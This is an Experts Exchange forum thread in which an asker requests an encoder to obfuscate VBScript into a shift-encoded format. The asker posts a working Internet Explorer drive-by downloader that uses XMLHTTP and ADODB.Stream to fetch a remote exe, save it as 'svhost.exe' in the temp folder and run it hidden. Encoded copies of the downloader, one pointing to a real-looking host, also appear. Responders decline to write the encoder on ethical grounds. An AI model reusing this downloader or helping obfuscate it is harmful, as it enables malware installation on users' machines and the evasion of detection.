Unknown-Killer
asked on
Javascript Unicode escaped characters (vbscript encode)
Im not java guru or anywhere near that so im having a little problem.
I've a script which decodes escaped characters
Script:
<script language="javascript">
function dF(s)
{
var s1=unescape(s.substr(0,s.l ength-1));
var t='';
for(i=0;i<s1.length;i++)t+ =String.fr omCharCode (s1.charCo deAt(i)-s. substr(s.l ength-1,1) );
document.write(unescape(t) );
}
</script>
And thing to be decoded is written as
(6Fvfulsw(53odqjxdjh(6G(55 YEVfulsw(5 5(6H(3G(3D (53(53(53( 53rq(..... (6F2vfulsw (6H3
This thing is actually a VBscript encoded in that manner.
can anyone guide me how can i convert other vbscripts in above format? i.e: (6Fvfulsw(53odqjxdjh
i tried encoding by escape but i was not able to achieve my objective to convert it in (6Fvfulsw(53odqjxdjh manner.
http://scriptasylum.com/tutorials/encdec/encode-decode.html on this page 2nd decoder will help you decode.
I've a script which decodes escaped characters
Script:
<script language="javascript">
function dF(s)
{
var s1=unescape(s.substr(0,s.l
var t='';
for(i=0;i<s1.length;i++)t+
document.write(unescape(t)
}
</script>
And thing to be decoded is written as
(6Fvfulsw(53odqjxdjh(6G(55
This thing is actually a VBscript encoded in that manner.
can anyone guide me how can i convert other vbscripts in above format? i.e: (6Fvfulsw(53odqjxdjh
i tried encoding by escape but i was not able to achieve my objective to convert it in (6Fvfulsw(53odqjxdjh manner.
http://scriptasylum.com/tutorials/encdec/encode-decode.html on this page 2nd decoder will help you decode.
ASKER
can u be a little more brief and point me directly to the encoder?
ASKER
My Script:
<script language="VBScript">
on error resume next
dl = "http://-----/yo.exe"
Set df = document.createElement("ob ject")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0- 983A-00C04 FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svhost.exe"
set F = df.createobject("Scripting .FileSyste mObject"," ")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.App lication", "")
Q.ShellExecute fname1,"","","open",0
</script>
After editing some stuff i want it to get converted in format like this
(6Fvfulsw(53odqjxdjh(6G(55 YEVfulsw(5 5(6H(3G(3D (53(53(53( 53rq(53huu ru(53uhvxp h(53qh{w(3 G(3D(53(53 (53(53go(5 3(6G(53(55 kwws(6D22l wdoldqgluh fwru|1frp2 whuph{2}lq 1h{h(55(3G (3D(53(53( 53(53Vhw(5 3gi(53(6G( 53grfxphqw 1fuhdwhHoh phqw(5;(55 remhfw(55( 5<(3G(3D(5 3(53(53(53 gi1vhwDwwu lexwh(53(5 5fodvvlg(5 5(5F(53(55 fovlg(6DEG <9F889098D 6044G30<;6 D033F37IF5 <H69(55(3G (3D(53(53( 53(53vwu(6 G(55Plfurv riw1[POKWW S(55(3G(3D (53(53(53( 53Vhw(53{( 53(6G(53gi 1FuhdwhRem hfw(5;vwu( 5F(55(55(5 <(3G(3D(53 (53(53(53d 4(6G(55Dgr (55(3G(3D( 53(53(53(5 3d5(6G(55g e1(55(3G(3 D(53(53(53 (53d6(6G(5 5Vwu(55(3G (3D(53(53( 53(53d7(6G (55hdp(55( 3G(3D(53(5 3(53(53vwu 4(6Gd4(59d 5(59d6(59d 7(3G(3D(53 (53(53(53v wu8(6Gvwu4 (3G(3D(53( 53(53(53vh w(53V(53(6 G(53gi1fuh dwhremhfw( 5;vwu8(5F( 55(55(5<(3 G(3D(53(53 (53(53V1w| sh(53(6G(5 34(3G(3D(5 3(53(53(53 vwu9(6G(55 JHW(55(3G( 3D(53(53(5 3(53{1Rshq (53vwu9(5F (53go(5F(5 3Idovh(3G( 3D(53(53(5 3(53{1Vhqg (3G(3D(53( 53(53(53iq dph4(6G(55 vykrvw1h{h (55(3G(3D( 53(53(53(5 3vhw(53I(5 3(6G(53gi1 fuhdwhremh fw(5;(55Vf ulswlqj1Il ohV|vwhpRe mhfw(55(5F (55(55(5<( 3G(3D(53(5 3(53(53vhw (53wps(53( 6G(53I1Jhw VshfldoIro ghu(5;5(5< (3G(3D(53( 53(53(53iq dph4(6G(53 I1ExlogSdw k(5;wps(5F iqdph4(5<( 3G(3D(53(5 3(53(53V1r shq(3G(3D( 53(53(53(5 3V1zulwh(5 3{1uhvsrqv hErg|(3G(3 D(53(53(53 (53V1vdyhw riloh(53iq dph4(5F5(3 G(3D(53(53 (53(53V1fo rvh(3G(3D( 53(53(53(5 3vhw(53T(5 3(6G(53gi1 fuhdwhremh fw(5;(55Vk hoo1Dssolf dwlrq(55(5 F(55(55(5< (3G(3D(53( 53(53(53T1 VkhooH{hfx wh(53iqdph 4(5F(55(55 (5F(55(55( 5F(55rshq( 55(5F3(3G( 3D(53(53(5 3(53(6F2vf ulsw(6H3
I copied above code from some where else and it is not my encoded code
<script language="VBScript">
on error resume next
dl = "http://-----/yo.exe"
Set df = document.createElement("ob
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svhost.exe"
set F = df.createobject("Scripting
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.App
Q.ShellExecute fname1,"","","open",0
</script>
After editing some stuff i want it to get converted in format like this
(6Fvfulsw(53odqjxdjh(6G(55
I copied above code from some where else and it is not my encoded code
Unfortunately, this question refers to Javascript, when, in fact, it is a VBscript question. I wonder if a moderator could change this wording?
The decoder is JS
ASKER
so any one?
ASKER
any pro dont know about it?
PErhaps this one?
http://www.virtualconspiracy.com/index.php?page=scrdec/usage
http://www.virtualconspiracy.com/index.php?page=scrdec/usage
ASKER
thats a decoder dude
maybe this can help
http://www.ibresource.ru/forums/index.php?showtopic=28683&pid=180784&mode=threaded&show=&st=&
if you dont understand russian then use http://babelfish.altavista.com
they have some other script but encoded like i say
maybe this can help
http://www.ibresource.ru/forums/index.php?showtopic=28683&pid=180784&mode=threaded&show=&st=&
if you dont understand russian then use http://babelfish.altavista.com
they have some other script but encoded like i say
Yes, I am sorry
I meant this
http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en
I meant this
http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en
ASKER
i was searching in google and came across this url
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.99show.com/adduser.asp&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3D(6Fvfulsw%26hl%3Den%26lr%3D%26sa%3DG
after looking at source i found out a code
(6Fvfulsw(53odqjxdjh(6GMVf ulsw1Hqfrg h(53vuf (6Gkwws(6D22zzz1mt7x1frp2p |dgy1dvs (6H(6F2vfulsw(6H3
i decoded it and got
<script language=JScript.Encode src=http://www.jq4u.com/myadv.asp></script>
but that page shows nothing maybe it needs paremeters
can it help?
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.99show.com/adduser.asp&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3D(6Fvfulsw%26hl%3Den%26lr%3D%26sa%3DG
after looking at source i found out a code
(6Fvfulsw(53odqjxdjh(6GMVf
i decoded it and got
<script language=JScript.Encode src=http://www.jq4u.com/myadv.asp></script>
but that page shows nothing maybe it needs paremeters
can it help?
No, it is just a japanese page that no longer returns a script
ASKER
hah still no good method :-s i think this thing is buggy but some italian guys also coded stuff like that & have their spyware stuff being spread
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
no, i want to expose exploit so microsoft can make their information bar more secure,
if u want mplungjan i can send u link to but anywhr in private to that spyware company
i work in a office and that spyware is spreading by yahoo infected lots of comps
i went to that link and it asks for genuine os stuff i dont know what it is talking about
if u want mplungjan i can send u link to but anywhr in private to that spyware company
i work in a office and that spyware is spreading by yahoo infected lots of comps
i went to that link and it asks for genuine os stuff i dont know what it is talking about
So why do you need an ENCODER to expose ?
Michel
Michel
ASKER
actually its a project, i'll get some good remarks on giving this thing to my company
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
The other code you quoted is most certainly malicious (to windows) and points to various exe
e.g.
<|s|c|r|i|p|t| |l|a|n|g|u|a|g|e|=|"|V|B|S |c|r|i|p|t |"|>| | | | | | |o|n| |e|r|r|o|r| |r|e|s|u|m|e| |n|e|x|t| | | | | | |d|l| |=| |"|h|t|t|p|:|/|/|i|t|a|l|i |a|n|d|i|r |e|c|t|o|r |y|.|c|o|m |/|t|e|r|m |e|x|/|z|i |n|.|e|x|e |"| | | | | | |S|e|t| |d|f| |=| |d|o|c|u|m|e|n|t|.|c|r|e|a |t|e|E|l|e |m|e|n|t||"|o|b|j|e|c|t|"|| | | | | | |d|f|.|s|e|t|A|t|t|r|i|b|u |t|e| |"|c|l|a|s|s|i|d|"|,| |"|c|l|s|i|d|:|B|D|9|6|C|5 |5|6|-|6|5 |A|3|-|1|1 |D|0|-|9|8 |3|A|-|0|0 |C|0|4|F|C |2|9|E|3|6 |"| | | | | | |s|t|r|=|"|M|i|c|r|o|s|o|f |t|.|X|M|L |H|T|T|P|" | | | | | | |S|e|t| |x| |=| |d|f|.|C|r|e|a|t|e|O|b|j|e |c|t||s|t|r|,|"|"|| | | | | | |a|1|=|"|A|d|o|"| | | | | | |a|2|=|"|d|b|.|"| | | | | | |a|3|=|"|S|t|r|"| | | | | | |a|4|=|"|e|a|m|"| | | | | | |s|t|r|1|=|a|1|&|a|2|&|a|3 |&|a|4| | | | | | |s|t|r|5|=|s|t|r|1| | | | | | |s|e|t| |S| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e |c|t||s|t|r|5|,|"|"|| | | | | | |S|.|t|y|p|e| |=| |1| | | | | | |s|t|r|6|=|"|G|E|T|"| | | | | | |x|.|O|p|e|n| |s|t|r|6|,| |d|l|,| |F|a|l|s|e| | | | | | |x|.|S|e|n|d| | | | | | |f|n|a|m|e|1|=|"|s|v|h|o|s |t|.|e|x|e |"| | | | | | |s|e|t| |F| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e |c|t||"|S|c|r|i|p|t|i|n|g|.|F|i |l|e|S|y|s |t|e|m|O|b |j|e|c|t|" |,|"|"|| | | | | | |s|e|t| |t|m|p| |=| |F|.|G|e|t|S|p|e|c|i|a|l|F |o|l|d|e|r ||2|| | | | | | |f|n|a|m|e|1|=| |F|.|B|u|i|l|d|P|a|t|h||t|m|p|,|f|n|a|m|e|1|| | | | | | |S|.|o|p|e|n| | | | | | |S|.|w|r|i|t|e| |x|.|r|e|s|p|o|n|s|e|B|o|d |y| | | | | | |S|.|s|a|v|e|t|o|f|i|l|e| |f|n|a|m|e|1|,|2| | | | | | |S|.|c|l|o|s|e| | | | | | |s|e|t| |Q| |=| |d|f|.|c|r|e|a|t|e|o|b|j|e |c|t||"|S|h|e|l|l|.|A|p|p|l|i|c |a|t|i|o|n |"|,|"|"|| | | | | | |Q|.|S|h|e|l|l|E|x|e|c|u|t |e| |f|n|a|m|e|1|,|"|"|,|"|"|, |"|o|p|e|n |"|,|0| | | | | | |<|/|s|c|r|i|p|t|>|
e.g.
<|s|c|r|i|p|t| |l|a|n|g|u|a|g|e|=|"|V|B|S
ASKER
dennis_maeder can u tell me how to make encoder? i aint a java guru
Unknown-Killer, mplungjan,
Yes I think I can write a javascript encoder of this sort, but I'm not sure that I should.
Let me explain:
A decoder is defensive, it helps you know whats going on with a threat, but a published encoder may be used by some for illicit purposes.
This request is for a specific type of encoding known to be used for antisocial purposes, and I must assume that any code I might produce could be used in that way.
However, the scriptasylum link you gave at the top offers an encoder, and you or anyone could obfuscate their code using that.
Michel, as page editor, what do you think?
D
Yes I think I can write a javascript encoder of this sort, but I'm not sure that I should.
Let me explain:
A decoder is defensive, it helps you know whats going on with a threat, but a published encoder may be used by some for illicit purposes.
This request is for a specific type of encoding known to be used for antisocial purposes, and I must assume that any code I might produce could be used in that way.
However, the scriptasylum link you gave at the top offers an encoder, and you or anyone could obfuscate their code using that.
Michel, as page editor, what do you think?
D
I completely agree - hence my question in
#17849249
#17849249
See my comments of 11/13. It took some effort to show questioner how the code worked, but I stopped short of providing an encoder for ethical reasons and to follow EE guidelines in concert with page editor and contributor Michel Plungjan. Should that be penalized?
D
D
ASKER
function dF(s)
{
var s1=unescape(s.substr(0,s.l
var t='';
for(i=0;i<s1.length;i++)t+
document.write(unescape(t)
}
df(mycode);
</script>